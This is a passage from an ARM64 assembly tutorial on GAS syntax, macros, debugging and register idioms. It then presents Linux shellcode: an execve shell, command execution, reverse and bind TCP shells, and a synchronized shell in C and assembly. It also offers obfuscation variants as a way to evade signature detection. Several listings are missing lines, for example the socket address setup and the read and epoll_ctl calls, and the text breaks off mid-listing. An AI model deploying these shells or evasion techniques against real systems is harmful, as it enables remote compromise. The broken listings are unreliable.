N denotes the numerator/dividend, D denotes the divisor and R denotes the remainder. The following assembly code is how it might be written by hand. The most notable change is using the msub instruction in place of a separate add and sub.

```        .arch armv8-a
.text
.align 2
.global calc

calc:
stp   x19, x20, [sp, -48]!
stp   x21, x22, [sp, 16]
stp   x23, x30, [sp, 32]

mov   w19, w0           // w19 = a
mov   w20, w1           // w20 = b
mov   w21, 4            // i = 4
mov   w22, 5            // set divisor
.LC2:
sdiv  w1, w20, w22      // w1 = b - ((b / 5) * 5)
msub  w1, w1, w22, w20  //
adr   x0, .LC0          // x0 = "%i\n"
bl    printf

add   w20, w20, w19     // b += a
subs  w21, w21, 1       // i = i - 1
bne   .LC2              //

ldp   x19, x20, [sp], 16
ldp   x21, x22, [sp], 16
ldp   x23, x30, [sp], 16
ret
.LC0:
.string "%i\n"
```

Use compiler generated assembly as a guide, but try to improve upon the code as shown in the above example.

### 3.3 Symbolic Constants

What if we want to use symbolic constants from C header files in our assembler code? There are two options.

1. Convert each symbolic constant to its GAS equivalent using the .EQU or .SET directives. Very time consuming.
2. Use C-style `#include` directive and pre-process using GNU CPP. Quicker with several advantages.

Obviously the second option is less painful and less likely to produce errors. Of course, I’m not discounting the possibility of automating the first option, but why bother? CPP has an option that will do it for us. Let’s see what the manual says.

Instead of the normal output, -dM will generate a list of `#define` directives for all the macros defined during the execution of the preprocessor, including predefined macros. This gives you a way of finding out what is predefined in your version of the preprocessor.

So, -dM will dump all the `#define` macros and -E will preprocess a file, but not compile, assemble or link. So, the steps to using symbolic names in our assembler code are:

1. Use `cpp` -dM to dump all the #defined keywords from each include header.
2. Use `sort` and `uniq` -u to remove duplicates.
3. Use the `#include` directive in our assembly source code.
4. Use `cpp` -E to preprocess and pipe the output to a new assembly file. (-o is an output option)
5. Assemble using `as` to generate an object file.
6. Link the object file to generate an executable.

The following is some simple code that displays Hello, World! to the console.

```#include "include.h"

.global _start
.text

_start:
mov    x8, __NR_write
mov    x2, hello_len
mov    x0, STDOUT_FILENO
svc    0

mov    x8, __NR_exit
svc    0

.data

hello_txt: .ascii "Hello, World!\n"
hello_len = . - hello_txt
```

Preprocess the above source using CPP -E. The result of this will be replacing each symbolic constant used with its assigned numeric value.

Finally, assemble using GAS and link with LD.

The following two directives are examples of simple text substitution or symbolic constants.

```  #define FALSE 0
#define TRUE  1
```

The equivalent can be accomplished with the .EQU or .SET directives in GAS.

```  .equ TRUE, 1
.set TRUE, 1

.equ FALSE, 0
.set FALSE, 0
```

Personally, I think it makes more sense to use the C preprocessor, but it’s entirely up to yourself.

### 3.4 Structures and Unions

A structure in programming is useful for combining different data types into a single user-defined data type. One of the major pitfalls in programming any assembly is poorly managed memory access. In my own experience, MASM always had the best support for data structures. NASM and YASM could be much better. Unfortunately support for structures in GAS isn’t great. Understandably, many of the hand-written assembly programs for Linux normally use global variables that are placed in the .data section of a source file. For a Position Independent Code (PIC) or thread-safe application that can only use local variables allocated on the stack, a data structure helps as a reference to manage those variables. Assigning names helps clarify what each stack address is for, and improves overall quality. It’s also much easier to modify code by simply re-arranging the elements of a structure later.

Take for example the following C structure dimension_t that requires conversion to GAS assembly syntax.

```typedef struct _dimension_t {
int x, y;
} dimension_t;
```

The closest directive to the struct keyword is .struct. Unfortunately this directive doesn’t accept a name and nor does it allow members to be enclosed between .struct and .ends that some of you might be familiar with in YASM/NASM. This directive only accepts an offset as a start position.

```        .struct 0
dimension_t.x:
.struct dimension_t.x + 4
dimension_t.y:
.struct dimension_t.y + 4
dimension_t_size:
```

An alternate way of defining the above structure can be done with the .skip or .space directives.

```        .struct 0
dimension_t.x: .skip 4
dimension_t.y: .skip 4
dimension_t_size:
```

If we have to manually define the size of each field in the structure, it seems the .struct directive is of little use. Consider using the #define keyword and preprocessing the file before assembling.

```#define dimension_t.x 0
#define dimension_t.y 4
#define dimension_t.size 8
```

For a union, it doesn’t get any better than what I suggest be used for structures. We can use the .set or .equ directives or refer back to a combination of using #define and cpp. Support for both unions and structures in GAS leaves a lot to be desired.

### 3.5 Operators

From time to time I’ll see some mention of “polymorphic” shellcodes where the author attempts to hide or obfuscate strings using simple arithmetic or bitwise operations. Usually the obfuscation is done via a bit rotation or exclusive-OR and this presumably helps evade detection by some security products.

Operators are arithmetic functions, like + or %. Prefix operators take one argument. Infix operators take two arguments, one on either side. Operators have precedence, but operations with equal precedence are performed left to right.

Precedence Operators
Highest Mutiplication (*), Division (/), Remainder (%), Shift Left (<<), Right Shift (>>).
Intermediate Bitwise inclusive-OR (|), Bitwise And (&), Bitwise Exclusive-OR (^), Bitwise Or Not (!).
Low Addition (+), Subtraction (-), Equal To (==), Not Equal To (!=), Less Than (<), Greater Than (>), Greater Than Or Equal To (>=), Less than Or Equal To (<=).
Lowest Logical And (&&). Logical Or (||).

The following examples show a number of ways to use operators prior to assembly. These examples just load the immediate value 0x12345678 into the w0 register.

```   // exclusive-OR
movz    w0, 0x5678 ^ 0x4823
movk    w0, 0x1234 ^ 0x5412
movz    w1, 0x4823
movk    w1, 0x5412, lsl 16
eor     w0, w0, w1

// rotate a value left by 5 bits using MOVZ/MOVK
movz    w0,  (0x12345678 << 5)        |  (0x12345678 >> (32-5)) & 0xFFFF
movk    w0, ((0x12345678 << 5) >> 16) | ((0x12345678 >> (32-5)) >> 16) & 0xFFFF, lsl 16
// then rotate right by 5 to obtain original value
ror     w0, w0, 5

// right rotate using LDR
.equ    ROT, 5

ldr     w0, =(0x12345678 << ROT) | (0x12345678 >> (32 - ROT)) & 0xFFFFFFFF
ror     w0, w0, ROT

// bitwise NOT
ldr     w0, =~0x12345678
mvn     w0, w0

// negation
ldr     w0, =-0x12345678
neg     w0, w0

```

### 3.6 Macros

If we need to repeat a number of assembly instructions, but with different parameters, using macros can be helpful. For example, you might want to eliminate branches in a loop to make code faster. Let’s say you want to load a 32-bit immediate value into a register. ARM instruction encodings are all 32-bits, so it isn’t possible to load anything more than a 16-bit immediate. Some immediate values can be stored in the literal pool and loaded using LDR, but if we use just MOV instructions, here’s how to load the 32-bit number 0x12345678 into register w0.

```  movz    w0, 0x5678
movk    w0, 0x1234, lsl 16
```

The first instruction MOVZ loads 0x5678 into w0, zero extending to 32-bits. MOVK loads 0x1234 into the upper 16-bits using a shift, while preserving the lower 16-bits. Some assemblers provide a pseudo-instruction called MOVL that expands into the two instructions above. However, the GNU Assembler doesn’t recognize it, so here are two macros for GAS that can load a 32-bit or 64-bit immediate value into a general purpose register.

```  // load a 64-bit immediate using MOV
.macro movq Xn, imm
movz    \Xn,  \imm & 0xFFFF
movk    \Xn, (\imm >> 16) & 0xFFFF, lsl 16
movk    \Xn, (\imm >> 32) & 0xFFFF, lsl 32
movk    \Xn, (\imm >> 48) & 0xFFFF, lsl 48
.endm

// load a 32-bit immediate using MOV
.macro movl Wn, imm
movz    \Wn,  \imm & 0xFFFF
movk    \Wn, (\imm >> 16) & 0xFFFF, lsl 16
.endm
```

Then if we need to load a 32-bit immediate value, we do the following.

```  movl    w0, 0x12345678
```

Here are two more that imitate the PUSH and POP instructions. Of course, this only supports a single register, so you might want to write your own.

```  // imitate a push operation
.macro push Rn:req
str     \Rn, [sp, -16]
.endm

// imitate a pop operation
.macro pop Rn:req
ldr     \Rn, [sp], 16
.endm

```

### 3.7 Conditional assembly

Like the GNU C compiler, GAS provides support for if-else preprocessor directives. The following shows an example in C.

```    #ifdef BIND
// compile code to bind
#else
// compile code to connect
#endif
```

Next, an example for GAS.

```   .ifdef BIND
// assemble code to bind
.else
// assemble code for connect
.endif
```

GAS also supports something similar to the #ifndef directive in C.

```    .ifnotdef BIND
// assemble code for connect
.else
// assemble code for bind
.endif
```

These are ignored by the assembler. Intended to provide an explanation for what code does. C style comments /* */ or C++ style // are a good choice. Ampersand (@) and hash (#) are also valid, however, you should know that when using the preprocessor on an assembly source code, comments that start with the hash symbol can be problematic. I tend to use C++ style for single line comments and C style for comment blocks.

```  # This is a comment

// This is a comment

/*
This is a comment
*/

@ This is a comment.
```

## 4. GNU Debugger

Sometimes it’s necessary to closely monitor the execution of code to find the location of a bug. This is normally accomplished via breakpoints and single-stepping through each instruction.

### 4.1 Layout

There are various front ends for GDB that are intended to enhance debugging. Personally I don’t use GDB enough to be familiar with any of them. The setup I have is simply a split layout that shows disassembly and registers. This has worked well enough for what I need writing these simple codes, but you may want to experiment with the front ends. The following screenshot is what a split layout looks like.

To setup a split layout, save the following to \$HOME/.gdbinit

```layout split
layout regs
```

### 4.2 Commands

The following are a number of commands I’ve found useful for writing code.

Command Description
stepi Step into instruction.
nexti Step over instruction. (skips calls to subroutines)
set follow-fork-mode child Debug child process.
set follow-fork-mode parent Debug parent process.
layout split Display the source, assembly, and command windows.
layout regs Display registers window.
refresh Refresh the screen layout.
tty [device] Specifies the terminal device to be used for the debugged process.
continue Continue with execution.
run Run program from start.
define Combine commands into single user-defined command.

During execution of code, the window may become unstable. One way around this is to use the ‘refresh’ command, however, that probably only corrects it once. You can use the ‘define’ command to combine multiple commands into one macro.

```(gdb) define stepx
Type commands for definition of "stepx".
End with a line saying just "end".
>stepi
>refresh
>end
(gdb)
```

This works, but it’s not ideal. The screen will still bump. The best workaround I could find is to create a new terminal window. Obtain the TTY and use this in GDB. e.g. `tty /dev/pts/1`

## 5. Common Operations

Initializing or checking the contents of a register are very common operations in any assembly language. Knowing multiple ways to perform these actions can potentially help evade signature detection tools. What I show here isn’t an extensive list of ways by any means because there are umpteen ways to perform any operation, it just depends on how many instructions you wish to use.

### 5.1 Saving Registers

We can freely use 19 registers without having to preserve them for the caller. Compare this with x86 where only 3 registers are available or 5 for AMD64. One minor annoyance with ARM is calling subroutines. Unlike INTEL CPUs, ARM doesn’t store a return address on the stack. It stores the return address in the Link Register (LR) which is an alias for the x30 register. A callee is expected to save LR/x30 if it calls a subroutine. Not doing so will cause problems. If you migrate from ARM32, you’ll miss the convenience of push and pop to save registers. These instructions have been deprecated in favour of load and store instructions, so we need to use STR/STP to save and LDR/LDP to restore. Here’s how you can save/restore registers using the stack.

```    // push {x0}
// [base - 16] = x0
// base = base - 16
str    x0, [sp, -16]!

// pop {x0}
// x0 = [base]
// base = base + 16
ldr    x0, [sp], 16

// push {x0, x1}
stp    x0, x1, [sp, -16]!

// pop {x0, x1}
ldp    x0, x1, [sp], 16
```

You might be wondering why 16 is used to store one register. The stack must always be aligned by 16 bytes. Unaligned access can cause exceptions.

### 5.2 Copying Registers

The first example here is the “normal” way and the rest are a few alternatives.

```    // Move x1 to x0
mov     x0, x1

// Extract bits 0-63 from x1 and store in x0 zero extended.
ubfx   x0, x1, 0, 63

// x0 = (x1 & ~0)
bic    x0, x1, xzr

// x0 = x1 >> 0
lsr    x0, x1, 0

// Use a circular shift (rotate) to move x1 to x0
ror    x0, x1, 0

// Extract bits 0-63 from x1 and insert into x0
bfxil  x0, x1, 0, 63
```

### 5.3 Initialize register to zero.

Normally to initialize a counter “i = 0” or pass NULL/0 to a system call. Each one of these instructions will do that.

```    // Move an immediate value of zero into the register.
mov    x0, 0

// Copy the zero register.
mov    x0, xzr

// Exclusive-OR the register with itself.
eor    x0, x0, x0

// Subtract the register from itself.
sub    x0, x0, x0

// Mask the register with zero register using a bitwise AND.
// An immediate value of zero will work here too.
and    x0, x0, xzr

// Multiply the register by the zero register.
mul    x0, x0, xzr

// Extract 64 bits from xzr and place in x0.
bfxil  x0, xzr, 0, 63

// Circular shift (rotate) right.
ror    x0, xzr, 0

// Logical shift right.
lsr    x0, xzr, 0

// Reverse bytes of zero register.
rev    x0, xzr
```

### 5.4 Initialize register to 1.

Rarely does a counter start at 1, but it’s common enough passing to a system call.

```    // Move 1 into x0.
mov     x0, 1

// Compare x0 with x0 and set x0 if equal.
cmp     x0, x0
cset    x0, eq

// Bitwise NOT the zero register and store in x0. Negate x0.
mvn     x0, xzr
neg     x0, x0
```

### 5.5 Initialize register to -1.

Some system calls require this value.

```    // move -1 into register
mov     x0, -1

// copy the zero register inverted
mvn     x0, xzr

// x0 = ~(x0 ^ x0)
eon     x0, x0, x0

// x0 = (x0 | ~xzr)
orn     x0, x0, xzr

// x0 = (int)0xFF
mov     w0, 255
sxtb    x0, w0

// x0 = (x0 == x0) ? -1 : x0
cmp     x0, x0
csetm   x0, eq
```

### 5.6 Initialize register to 0x80000000.

This might seem vague now, but an algorithm like X25519 uses this value for its reduction step.

```    mov     w0, 0x80000000

// Set bit 31 of w0.
mov     w0, 1
mov     w0, w0, lsl 31

// Set bit 31 of w0.
mov     w0, 1
ror     w0, w0, 1

// Set bit 31 of w0.
mov     w0, 1
rbit    w0, w0

// Set bit 31 of w0.
eon     w0, w0, w0
lsr     w0, w0, 1

// Set bit 31 of w0.
mov     w0, -1
extr    w0, w0, wzr, 1
```

### 5.7 Testing for 1/TRUE.

A function returning TRUE normally indicates success, so these are some ways to test for that.

```    // Compare x0 with 1, branch if equal.
cmp     x0, 1
beq     true

// Compare x0 with zero register, branch if not equal.
cmp     x0, xzr
bne     true

// Subtract 1 from x0 and set flags. Branch if equal. (Z flag is set)
subs    x0, x0, 1
beq     true

// Negate x0 and set flags. Branch if x0 is negative.
negs    x0, x0
bmi     true

// Conditional branch if x0 is not zero.
cbnz    x0, true

// Test bit 0 and branch if not zero.
tbnz    x0, 0, true
```

### 5.8 Testing for 0/FALSE.

Normally we see a CMP instruction used in handwritten assembly code to evaluate this condition. This subtracts the source register from the destination register, sets the flags, and discards the result.

```    // x0 == 0
cmp     x0, 0
beq     false

// x0 == 0
cmp     x0, xzr
beq     false

ands    x0, x0, x0
beq     false

// same as ANDS, but discards result
tst     x0, x0
beq     false

// x0 == -0
negs    x0
beq     false

// (x0 - 1) == -1
subs    x0, x0, 1
bmi     false

// if (!x0) goto false
cbz     x0, false

// if (!x0) goto false
tbz     x0, 0, false
```

### 5.9 Testing for -1

Some functions will return a negative number like -1 to indicate failure. CMN is used in the first example. This behaves exactly like CMP, except it is adding the source value (register or immediate) to the destination register, setting the flags and discarding the result.

```    // w0 == -1
cmn     w0, 1
beq     failed

// w0 == 0
cmn     w0, wzr
bmi     failed

// negative?
ands    w0, w0, w0
bmi     failed

// same as AND, but discards result
tst     w0, w0
bmi     failed

// w0 & 0x80000000
tbz     w0, 31, failed
```

## 6. Linux Shellcode

Developing an operating system, writing boot code, reverse engineering or exploiting vulnerabilities; these are all valid reasons to learn assembly language. In the case of exploiting bugs, one needs to have a grasp of writing shellcodes. These are compact position independent codes that use system calls to interact with the operating system.

### 6.1 System Calls

System calls are a bridge between the user and kernel space running at a higher privileged level. Each call has its own unique number that is essentially an index into an array of function pointers located in the kernel. Whether you want to write to a file on disk, send and receive data over the network or just print a message to the screen, all of this must be performed via system calls at some point.

A full list of calls can be found in the Linux source tree on github here, but if you’re already logged into a Linux system running on ARM64, you might find a list in /usr/include/asm-generic/unistd.h too. Here are a few to save you time looking up.

```  // Linux/AArch64 system calls
.equ SYS_epoll_create1,   20
.equ SYS_epoll_ctl,       21
.equ SYS_epoll_pwait,     22
.equ SYS_dup3,            24
.equ SYS_fcntl,           25
.equ SYS_statfs,          43
.equ SYS_faccessat,       48
.equ SYS_chroot,          51
.equ SYS_fchmodat,        53
.equ SYS_openat,          56
.equ SYS_close,           57
.equ SYS_pipe2,           59
.equ SYS_write,           64
.equ SYS_pselect6,        72
.equ SYS_ppoll,           73
.equ SYS_splice,          76
.equ SYS_exit,            93
.equ SYS_futex,           98
.equ SYS_kill,           129
.equ SYS_reboot,         142
.equ SYS_setuid,         146
.equ SYS_setsid,         157
.equ SYS_uname,          160
.equ SYS_getpid,         172
.equ SYS_getppid,        173
.equ SYS_getuid,         174
.equ SYS_getgid,         176
.equ SYS_gettid,         178
.equ SYS_socket,         198
.equ SYS_bind,           200
.equ SYS_listen,         201
.equ SYS_accept,         202
.equ SYS_connect,        203
.equ SYS_sendto,         206
.equ SYS_recvfrom,       207
.equ SYS_setsockopt,     208
.equ SYS_getsockopt,     209
.equ SYS_shutdown,       210
.equ SYS_munmap,         215
.equ SYS_clone,          220
.equ SYS_execve,         221
.equ SYS_mmap,           222
.equ SYS_mprotect,       226
.equ SYS_wait4,          260
.equ SYS_getrandom,      278
.equ SYS_memfd_create,   279
.equ SYS_access,        1033
```

All registers except those required to return values are preserved. System calls return results in x0 while everything else remains the same, including the conditional flags. In the shellcode, only immediate values and stack are used for strings. This is the approach I recommend because it allows manipulation of the string before it’s stored on the stack. Using LDR and the literal pool is a good alternative.

### 6.2 Tracing

“strace” is a diagnostic and debugging utility for Linux can show problems in your code. It will show what system calls are implemented by the kernel and which ones are simply wrapper functions in GLIBC. As I found out while writing some of the shellcodes, there is no `dup2`, `pipe`, or `fork` system calls. There are only wrapper functions in GLIBC that call `dup3`, `pipe2` and `clone`.

### 6.3 Executing a shell.

```// 40 bytes

.arch armv8-a

.include "include.inc"

.global _start
.text

_start:
// execve("/bin/sh", NULL, NULL);
mov    x8, SYS_execve
mov    x2, xzr           // NULL
mov    x1, xzr           // NULL
movq   x3, BINSH         // "/bin/sh"
str    x3, [sp, -16]!    // stores string on stack
mov    x0, sp
svc    0
```

### 6.4 Executing a command.

Executing a command can be a good replacement for a reverse connecting or bind shell because if a system can execute netcat, ncat, wget, curl, GET then executing a command may be sufficient to compromise a system further. The following just echos “Hello, World!” to the console.

```// 64 bytes

.arch armv8-a
.align 4

.include "include.inc"

.global _start
.text

_start:
// execve("/bin/sh", {"/bin/sh", "-c", cmd, NULL}, NULL);
movq   x0, BINSH             // x0 = "/bin/sh\0"
str    x0, [sp, -64]!
mov    x0, sp
mov    x1, 0x632D            // x1 = "-c"
str    x1, [sp, 16]
adr    x2, cmd               // x2 = cmd
stp    x0, x1,  [sp, 32]     // store "-c", "/bin/sh"
stp    x2, xzr, [sp, 48]     // store cmd, NULL
mov    x2, xzr               // penv = NULL
add    x1, sp, 32            // x1 = argv
mov    x8, SYS_execve
svc    0
cmd:
.asciz "echo Hello, World!"

```

### 6.5 Reverse connecting shell over TCP.

The reverse shell makes an outgoing connection to a remote host and upon connection will spawn a shell that accepts input. Rather than use PC-relative instructions, the network address structure is initialized using immediate values.

```// 120 bytes

.arch armv8-a

.include "include.inc"

.equ PORT, 1234
.equ HOST, 0x0100007F // 127.0.0.1

.global _start
.text

_start:
// s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
mov     x8, SYS_socket
mov     x2, IPPROTO_IP
mov     x1, SOCK_STREAM
mov     x0, AF_INET
svc     0

mov     w3, w0       // w3 = s

// connect(s, &sa, sizeof(sa));
mov     x8, SYS_connect
mov     x2, 16
movq    x1, ((HOST << 32) | ((((PORT & 0xFF) << 8) | (PORT >> 8)) << 16) | AF_INET)
str     x1, [sp, -16]!
mov     x1, sp     // x1 = &sa
svc     0

// in this order
//
// dup3(s, STDERR_FILENO, 0);
// dup3(s, STDOUT_FILENO, 0);
// dup3(s, STDIN_FILENO,  0);
mov     x8, SYS_dup3
mov     x1, STDERR_FILENO + 1
c_dup:
mov     x2, xzr
mov     w0, w3
subs    x1, x1, 1
svc     0
bne     c_dup

// execve("/bin/sh", NULL, NULL);
mov     x8, SYS_execve
movq    x0, BINSH
str     x0, [sp]
mov     x0, sp
svc     0
```

### 6.6 Bind shell over TCP.

Pretty much the same as the reverse shell except we listen for incoming connections using three separate system calls. `bind`, `listen`, `accept` are used in place of `connect`. This could easily be updated to include `connect` using the conditional assembly discussed before.

```// 148 bytes

.arch armv8-a

.include "include.inc"

.equ PORT, 1234

.global _start
.text

_start:
// s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
mov     x8, SYS_socket
mov     x2, IPPROTO_IP
mov     x1, SOCK_STREAM
mov     x0, AF_INET
svc     0

mov     w3, w0       // w3 = s

// bind(s, &sa, sizeof(sa));
mov     x8, SYS_bind
mov     x2, 16
movl    w1, (((((PORT & 0xFF) << 8) | (PORT >> 8)) << 16) | AF_INET)
str     x1, [sp, -16]!
mov     x1, sp
svc     0

// listen(s, 1);
mov     x8, SYS_listen
mov     x1, 1
mov     w0, w3
svc     0

// r = accept(s, 0, 0);
mov     x8, SYS_accept
mov     x2, xzr
mov     x1, xzr
mov     w0, w3
svc     0

mov     w3, w0

// in this order
//
// dup3(s, STDERR_FILENO, 0);
// dup3(s, STDOUT_FILENO, 0);
// dup3(s, STDIN_FILENO,  0);
mov     x8, SYS_dup3
mov     x1, STDERR_FILENO + 1
c_dup:
mov     w0, w3
subs    x1, x1, 1
svc     0
bne     c_dup

// execve("/bin/sh", NULL, NULL);
mov     x8, SYS_execve
movq    x0, BINSH
str     x0, [sp]
mov     x0, sp
svc     0

```

### 6.7 Synchronized shell

“And now for something completely different.”

There’s nothing wrong with the bind or reverse shells mentioned. They work fine. However, it’s not possible to manipulate the incoming or outgoing streams of data, so there isn’t any confidentiality provided between two systems. To solve this we use sychronization. Most POSIX systems offer the `select` function for this purpose. It allows one to monitor I/O of file descriptors. However, `select` is limited in how many descriptors it can monitor in a single process. For that reason, `kqueue` on BSD and `epoll` on Linux were developed as they are unaffected by the same limitations.

```#define _GNU_SOURCE

#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <signal.h>
#include <sys/epoll.h>
#include <fcntl.h>
#include <sched.h>

#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stdlib.h>

int main(void) {
int                i, r, w, s, len, efd;
#ifdef BIND
int                s2;
#endif
int                fd, in[2], out[2];
char               buf[BUFSIZ];
struct epoll_event evts;
char               *args[]={"/bin/sh", NULL};
pid_t              ctid, pid;

// create pipes for redirection of stdin/stdout/stderr
pipe2(in, 0);
pipe2(out, 0);

// fork process
ctid = syscall(SYS_gettid);

pid  = syscall(SYS_clone,
CLONE_CHILD_SETTID   |
CLONE_CHILD_CLEARTID |
SIGCHLD, 0, NULL, 0, &ctid);

// if child process
if (pid == 0) {
// assign read end to stdin
dup3(in[0],  STDIN_FILENO,  0);
// assign write end to stdout
dup3(out[1], STDOUT_FILENO, 0);
// assign write end to stderr
dup3(out[1], STDERR_FILENO, 0);

// close pipes
close(in[0]);  close(in[1]);
close(out[0]); close(out[1]);

// execute shell
execve(args[0], args, 0);
} else {
// close read and write ends
close(in[0]); close(out[1]);

// create a socket
s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);

sa.sin_family = AF_INET;
sa.sin_port   = htons(atoi("1234"));

#ifdef BIND
// bind to port for incoming connections

listen(s, 0);
r = accept(s, 0, 0);
s2 = s; s = r;
#else
// connect to remote host

r = connect(s, (struct sockaddr*)&sa, sizeof(sa));
#endif

// if ok
if (r >= 0) {
// open an epoll file descriptor
efd = epoll_create1(0);

// add 2 descriptors to monitor stdout and socket
for (i=0; i<2; i++) {
fd = (i==0) ? s : out[0];
evts.data.fd = fd;
evts.events  = EPOLLIN;

}

// now loop until user exits or some other error
for (;;) {
r = epoll_pwait(efd, &evts, 1, -1, NULL);

// error? bail out
if (r < 0) break;

// not input? bail out
if (!(evts.events & EPOLLIN)) break;

fd = evts.data.fd;

// assign socket or read end of output
r = (fd == s) ? s     : out[0];
// assign socket or write end of input
w = (fd == s) ? in[1] : s;

// read from socket or stdout

if (!len) break;

// encrypt/decrypt data here

// write to socket or stdin
write(w, buf, len);
}
// remove 2 descriptors
epoll_ctl(efd, EPOLL_CTL_DEL, s, NULL);
epoll_ctl(efd, EPOLL_CTL_DEL, out[0], NULL);
close(efd);
}
// shutdown socket
shutdown(s, SHUT_RDWR);
close(s);
#ifdef BIND
close(s2);
#endif
// terminate shell
kill(pid, SIGCHLD);
}
close(in[1]);
close(out[0]);
return 0;
}
```

Let’s see how some of these calls were implemented using the A64 set. First, replacing the standard I/O handles with pipe descriptors.

```  // assign read end to stdin
dup3(in[0],  STDIN_FILENO,  0);
// assign write end to stdout
dup3(out[1], STDOUT_FILENO, 0);
// assign write end to stderr
dup3(out[1], STDERR_FILENO, 0);
```

The write end of out is assigned to stdout and stderr while the read end of in is assigned to stdin. We can perform this with the following.

```    mov     x8, SYS_dup3
mov     x2, xzr
mov     x1, xzr
ldr     w0, [sp, in0]
svc     0

ldr     w0, [sp, out1]
svc     0

ldr     w0, [sp, out1]
svc     0
```

Eleven instructions or 44 bytes are used for this. If we want to save a few bytes, we could use a loop instead. The value of `STDIN_FILENO` is conveniently zero and `STDERR_FILENO` is 2. We can simply loop from 0 to 3 and use a ternary operator to choose the correct descriptor.

```  for (i=0; i<3; i++) {
dup3(i==0 ? in[0] : out[1], i, 0);
}
```

To perform the same operation in assembly, we can use the CSEL instruction.

```    mov     x8, SYS_dup3
mov     x1, (STDERR_FILENO + 1) // x1 = 3
mov     x2, xzr                 // x2 = 0
ldp     w4, w3, [sp, out1]      // w4 = out[1], w3 = in[0]
c_dup:
subs    x1, x1, 1               //
csel    w0, w3, w4, eq          // w0 = (x1==0) ? in[0] : out[1]
svc     0
cbnz    x1, c_dup

```

Using a loop in place of what we orginally had, we remove three instructions and save a total of twelve bytes. A similar operation can be implemented for closing the pipe handles. In the C code, it simply closes each one in separate statements like so.

```  // close pipes
close(in[0]);  close(in[1]);
close(out[0]); close(out[1]);
```

For the assembly code, a loop is used instead. Six instructions are used instead of eight.

```    mov     x1, 4*4          // i = 4
mov     x8, SYS_close
cls_pipe:
sub     x1, x1, 4        // i--
ldr     w0, [sp, x1]     // w0 = pipes[i]
svc     0
cbnz    x1, cls_pipe     // while (i != 0)
```

The `epoll_pwait` system call is used instead of the `pselect6` system call to monitor file descriptors. Before calling `epoll_pwait` we must create an epoll file descriptor using `epoll_create1` and add descriptors to it using `epoll_ctl`. The following code does that once a connection to remote peer has been established.

```  // add 2 descriptors to monitor stdout and socket
for (i=0; i<2; i++) {
fd = (i==0) ? s : out[0];
evts.data.fd = fd;
evts.events  = EPOLLIN;

}
```

All registers including the process state are preserved across system calls. So we could implement the above code using the following assembly code.

```    mov     x8, SYS_epoll_ctl
add     x3, sp, evts       // x3 = &evts
mov     x4, EPOLLIN

ldr     w2, [sp, s]        // w2 = s
stp     x4, x2, [sp, evts]
ldr     w0, [sp, efd]      // w0 = efd
svc     0

ldr     w2, [sp, out0]     // w2 = out[0]
stp     x4, x2, [sp, evts]
ldr     w0, [sp, efd]      // w0 = efd
svc     0
```

Twelve instructions used here or forty-eight bytes. Using a loop, let’s see if we can save more space. Some of you may have noticed both `EPOLL_CTL_ADD` and `EPOLLIN` are 1. We can save 4 bytes with the following.

```    // epoll_ctl(efd, EPOLL_CTL_ADD, fd, &evts);
ldr     w2, [sp, s]
ldr     w4, [sp, out0]
poll_init:
mov     x8, SYS_epoll_ctl
stp     x1, x2, [x3]
ldr     w0, [sp, efd]
svc     0
cmp     w2, w4
mov     w2, w4
bne     poll_init
```

The value returned by the `epoll_pwait` system call must be checked before continuing to process the events structure. If successful, it will return the number of file descriptors that were signalled while -1 will indicate an error.

```  r = epoll_pwait(efd, &evts, 1, -1, NULL);

// error? bail out
if (r < 0) break;
```

Recall in the Common Operations section where we test for -1. One could use the following assembly code.

```    tst     x0, x0
bmi     cls_efd
```

A64 provides a conditional branch opcode that allows us to execute the IF statement in one instruction.

```    tbnz    x0, 31, cls_efd
```

After this check, we then need to determine if the signal was the result of input. We are only monitoring for input to a read end of pipe and socket. Every other event would indicate an error.

```  // not input? bail out
if (!(evts.events & EPOLLIN)) break;

fd = evts.data.fd;
```

The value of `EPOLLIN` is 1, and we only want those type of events. By masking the value of events with 1 using a bitwise AND, if the result is zero, then the peer has disconnected. Load pair is used to load both the events and data_fd values simultaneously.

```    // x0 = evts.events, x1 = evts.data.fd
ldp     x0, x1, [sp, evts]

// if (!(evts.events & EPOLLIN)) break;
tbz     w0, 0, cls_efd
```

Our code will read from either out[0] or s.

```  // assign socket or read end of output
r = (fd == s) ? s     : out[0];
// assign socket or write end of input
w = (fd == s) ? in[1] : s;
```

Using the highly useful conditional select instruction, we can select the correct descriptors to read and write to.

```    // w3 = s
ldr     w3, [sp, s]
// w5 = in[1], w4 = out[0]
ldp     w5, w4, [sp, in1]

// fd == s
cmp     w1, w3

// r = (fd == s) ? s : out[0];
csel    w0, w3, w4, eq

// w = (fd == s) ? in[1] : s;
csel    w3, w5, w3, eq
```

The final assembly code for the synchronized shell follows.

```    .arch armv8-a
.align 4

// default TCP port
.equ PORT, 1234

// default host, 127.0.0.1
.equ HOST, 0x0100007F

// comment out for a reverse connecting shell
.equ BIND, 1

// comment out for code to behave as a function
.equ EXIT, 1

.include "include.inc"

// structure for stack variables

.struct 0
p_in: .skip 8
.equ in0, p_in + 0
.equ in1, p_in + 4

p_out:.skip 8
.equ out0, p_out + 0
.equ out1, p_out + 4

id:   .skip 8
efd:  .skip 4
s:    .skip 4

.ifdef BIND
s2:   .skip 8
.endif

evts: .skip 16
.equ events, evts + 0
.equ data_fd,evts + 8

buf:  .skip BUFSIZ
ds_tbl_size:

.global _start
.text
_start:
// allocate memory for variables
// ensure data structure aligned by 16 bytes
sub     sp, sp, (ds_tbl_size & -16) + 16

// create pipes for stdin
// pipe2(in, 0);
mov     x8, SYS_pipe2
mov     x1, xzr
svc     0

// create pipes for stdout + stderr
// pipe2(out, 0);
svc     0

// syscall(SYS_gettid);
mov     x8, SYS_gettid
svc     0
str     w0, [sp, id]

// clone(CLONE_CHILD_SETTID   |
//       CLONE_CHILD_CLEARTID |
//       SIGCHLD, 0, NULL, NULL, &ctid)
mov     x8, SYS_clone
add     x4, sp, id           // ctid
mov     x3, xzr              // newtls
mov     x2, xzr              // ptid
movl    x0, (CLONE_CHILD_SETTID + CLONE_CHILD_CLEARTID + SIGCHLD)
svc     0
str     w0, [sp, id]         // save id
cbnz    w0, opn_con          // if already forked?
// open connection
// in this order..
//
// dup3 (out[1], STDERR_FILENO, 0);
